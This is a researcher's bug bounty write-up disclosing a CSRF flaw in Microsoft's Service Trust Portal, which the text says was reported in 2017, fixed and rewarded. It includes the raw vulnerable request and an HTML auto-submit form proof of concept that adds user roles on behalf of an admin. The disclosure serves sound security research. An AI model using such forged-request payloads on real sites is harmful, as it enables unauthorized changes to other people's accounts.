Microsoft CSRF Vulnerability
I am Adesh Nandkishor Kolte an Independent Security Resercher From India
and also working with SecureLayer7 as a Security Consultant
Talking about Microsoft bug bounty first point they only accept submission which is high impact. Big `NO` to low hanging fruits and big `NO` if you can not exploit the bug. I was testing one of Microsoft domain — Service Trust Portal (STP).
During the testing, I came across below feature in their portal where you can add Portal users and Portal admin. The Add User feature caught my attention, generally speaking while checking out the application I always try to correlate application work flow with respect to different attack vector which I can execute , so that time straight away I though about CSRF.
Vulnerable URL:
https://trustportal.office.com/onboarding/AddUserRole
POC:-
HTTP Request:-
GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive
From above HTTP Request we conclude that there is no CSRF token present.
This way by using this loophole I was able to Add User roles on behalf of admin user.
Exploitation:-
<html>
<body>
<form action=”https://trustportal.office.com/onboarding/AddUserRole/1110">
<input type=”hidden” name=”role” value=”User” />
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>
So I was able to add any user in their Cloud Service Trust Portal by using CSRF Attack.
They listed me in their Hall Of Fame and Rewarded me with the bounty.
Aug 14, 2017 : Reported to Microsoft Security Response Center.
Aug 20, 2017 : Received initial reply from Microsoft Team. Report Triaged
Aug 25, 2017 : Microsoft Security Team successfully reproduced the bug.
Sep 16, 2017 : Microsoft Security Team Fixed the reported bug.
Oct 01, 2017 : Bounty Awarded of $500 by Microsoft
Disclosed……